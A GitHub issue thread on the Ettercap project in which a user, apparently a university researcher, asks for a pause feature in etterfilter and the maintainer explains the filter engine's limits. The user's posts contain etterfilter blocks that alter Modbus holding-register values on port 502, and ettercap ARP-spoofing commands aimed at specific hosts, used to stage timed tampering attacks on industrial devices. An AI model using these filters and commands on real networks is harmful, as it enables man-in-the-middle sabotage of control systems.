Ettercap / ettercap

Ettercap Project
http://www.ettercap-project.org
GNU General Public License v2.0

Pause #956

Open luismartinsez opened 5 years ago

luismartinsez commented 5 years ago

Hi Alexander,

A quick question:

In Etterfilter, is it possible to pause the program block for 5 minutes before continuing?

For example:

First block

if (tcp.src == 502 && DATA.data+11 == "\x00\xe1") { DATA.data + 11 = "\x0b\xb8"; msg("Holding Register 1 data replaced"); }

sleep 5m # Waits 5 minutes.

Second block

if (tcp.src == 502 && DATA.data+12 == "\x00\x00") { DATA.data + 12 = "\x00\x7d"; msg("Holding Register 2 data replaced"); }

Sleep command is used in Shell script to pause between blocks.

Is there an equivalent command in etterfilter? At present, the unload filter option will completely stop all program blocks. I want the filter to be active and the first block to be running during the pause period.

Is this possible?

luismartinsez commented 5 years ago

Filter17.txt

luismartinsez commented 5 years ago

Just wondering if you have some time to look into this request.

luismartinsez commented 5 years ago

Could you kindly advise if this is possible?

koeppea commented 5 years ago

I think w/o having it tested, it won't have the desired effect. I think you want only the filtering engine of ettercap set to sleep for a certain amount of time. However the filtering engine doesn't support such a feature. Even using exec('/bin/sleep'); wouldn't have the desired effect, because it forks a new child process and then fires up the sleep command. But the parent process doesn't wait for the child to complete or abort.

Also, this requirement sounds pretty uncommon, so an implementation wouldn't probably be of benefit for more than just you? Or could you outline a practical, common use case which would require such functionality for other people as well?
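As an added illustration of the point above (this is not ettercap's code), the program below forks and execs the system `sleep` binary twice: once fire-and-forget, as a filter `exec()` would, and once with an explicit `waitpid()`. Only the second call actually holds the caller for the requested time; the `/bin/sleep` path and the one-second duration are assumptions.

```c
/* Added illustration, not ettercap code: a fork()+exec() of /bin/sleep does not
 * pause the parent unless the parent explicitly waits for the child. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <time.h>

static double now_seconds(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (double)ts.tv_sec + (double)ts.tv_nsec / 1e9;
}

/* Fork and exec "sleep <secs>". With wait_for_child != 0 the parent blocks
 * until the child exits (what a real pause would need); with 0 it returns
 * immediately, which is the fire-and-forget behaviour of a filter exec().
 * Returns the seconds the caller was actually held, or -1.0 on fork error. */
double run_sleep(int secs, int wait_for_child)
{
    char arg[16];
    snprintf(arg, sizeof arg, "%d", secs);
    double start = now_seconds();
    pid_t pid = fork();
    if (pid < 0)
        return -1.0;
    if (pid == 0) {
        execl("/bin/sleep", "sleep", arg, (char *)NULL);
        sleep((unsigned)secs);   /* exec failed (assumed path missing): sleep in the child itself */
        _exit(127);
    }
    if (wait_for_child)
        waitpid(pid, NULL, 0);   /* parent is held for the full duration */
    double held = now_seconds() - start;
    if (!wait_for_child)
        waitpid(pid, NULL, 0);   /* reap afterwards so no zombie remains; timing already taken */
    return held;
}

int main(void)
{
    printf("fire-and-forget exec: caller held %.3f s\n", run_sleep(1, 0));
    printf("exec plus waitpid:    caller held %.3f s\n", run_sleep(1, 1));
    return 0;
}
```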

luismartinsez commented 5 years ago

Thanks for your response.

I believe it's an important feature because in a modern network there are several layers: enterprise layer, perimeter layer, manufacturing layer etc. When a virus enters one of the weak network layers, it just waits in the entered network and monitors, studies, analyzes and captures network activities where the virus resides. The virus decides the next move after analysing the behaviour of network packets. This is because modern networks are protected using rigid security measures, so it is impossible to make a desired attack in the first attempt. Recent academic journals on network attacks show a virus or an intruder cannot establish a successful attack on the first attempt; however, the attacker remains silent on the network for several days or weeks to study network activities. (I can provide several published journals if required.)

Nowadays, we researchers heavily rely on Ettercap to perform various real-time analyses in university labs. It would be helpful for students if you could incorporate this feature.

Thanks

koeppea commented 5 years ago

So, to get it right: only the filtering engine should pause, but MITM and forwarding through ettercap should continue? BTW: I'd be interested anyway in a published article desiring this.

luismartinsez commented 5 years ago

I have e-mailed you (format_c) some academic journals pointing out the usage.

The filter engine should continue to the block where "pause" has been defined. In the following example, the filtering engine must be processing Block 1 and wait 60 seconds before executing Block 2.

When it reaches the "sleep 30" section after Block 2, the filtering engine must be processing Block 1 and Block 2 and wait 30 seconds before executing Block 3.

When it reaches the "sleep 90" section after Block 3, the filtering engine must be processing Block 1, Block 2, Block 3 and wait 90 seconds before executing Block 4.

When it reaches the "sleep 120" section after Block 4, the filtering engine must be processing Block 1, Block 2, Block 3, Block 4 and wait 120 seconds before executing Block 5. Once it has passed "sleep(120)", all Blocks from 1 through to 5 must be running at this stage.

In short, the predecessor blocks must be active at each pause.

sample.filter

Block 1

if (ip.proto == UDP || ip.proto == TCP && tcp.src == 80) { }

sleep 60; # Delay for 1 minute (60 seconds)

Block 2

if (ip.proto == TCP && tcp.src == 80 || ip.proto == UDP) { }

sleep 30; # Delay for 30 Seconds

Block 3

if (ip.proto == TCP && tcp.src == 160 || ip.proto == UDP) { }

sleep 90; # Delay for 90 Seconds

Block 4

sleep(120) # Delay for 2 minutes (120 seconds)

Block 5

if (ip.proto == TCP && tcp.src == 25 || ip.proto == UDP) { }

luismartinsez commented 5 years ago

Understanding your very busy schedule, I'm sending you this note as a kind reminder to understand if it is possible to have a "Sleep" command incorporated in Ettercap. We're completely stuck and unable to proceed any further with our research without this feature.

Appreciate your response

koeppea commented 5 years ago

I haven't had time yet to investigate further. It's still on my list. If you need this that urgently, you're free to contribute yourself. It's Open Source.

luismartinsez commented 5 years ago

Thanks for your response. Rightly guessed you're occupied with several other important matters.

Regarding contribution, unfortunately we don't have time & resources allocated for development, and for this reason we have decided to opt for a ready-to-use tool like Ettercap :-)

Do you know of a marketplace from where we can hire a programmer to accomplish this feature in Ettercap? We will contribute the changes to Ettercap community if you can suggest an Ettercap programmer.

On Wed, Aug 21, 2019 at 1:05 PM Alexander Köppe notifications@github.com wrote:

I haven't had time yet to investigate further. It's still on my list. If you need this that urgently, you're free to contribute yourself. It's Open Source.


koeppea commented 5 years ago

No sorry. I'm not aware of such a marketplace.

luismartinsez commented 5 years ago

I have sent an update to your e-mail. This request can be closed, if you prefer.

koeppea commented 5 years ago

Thanks. I prefer to let it open until I’ve evaluated if this would actually be possible to implement w/o ripping the whole application architecture apart.

Especially the filtering engine is very tricky.

luismartinsez commented 5 years ago

No problem. Thanks :-)

luismartinsez commented 5 years ago

Adding to the above - I will have my testbed for some more time if you want to test this feature once you finish evaluation.

koeppea commented 5 years ago

Could you produce a packet capture reflecting that behaviour?

luismartinsez commented 5 years ago

I am following the steps below, in sequential order. You can note that sessions use a unique Ethernet interface.

  1. sudo ettercap -T -q -i enx503eaa961cce -F sleep1.ef -M ARP /192.168.0.65/

Send new values to Target1

Register 1 - if 0 then 650
Register 2 - if 225 then 3000
Register 3 - if 0 then 125

Triggered sleep2.ef after 30 seconds in a new terminal session

  2. sudo ettercap -T -q -i enp0s25 -F sleep2.ef -M ARP /192.168.0.66/

Send new values to Target2

Register 1 - 999
Register 2 - 650
Register 3 - 3000

Triggered sleep3.ef after 50 seconds in a new terminal session

  3. sudo ettercap -T -q -i enx503eaa20aaff -F sleep3.ef -M ARP /192.168.0.67/

Send new values to Target3

Register 1 - 850
Register 3 - 8888
Register 4 - 7777

The only limitation with this method is that we can attack only one target at a time. Ideally the system should support conditions for all targets in each step, similar to sleepreq.filter. I can combine the three scripts into one if you can find a way to define sleep somewhere in the program.

Attached pcap and filters sleep.zip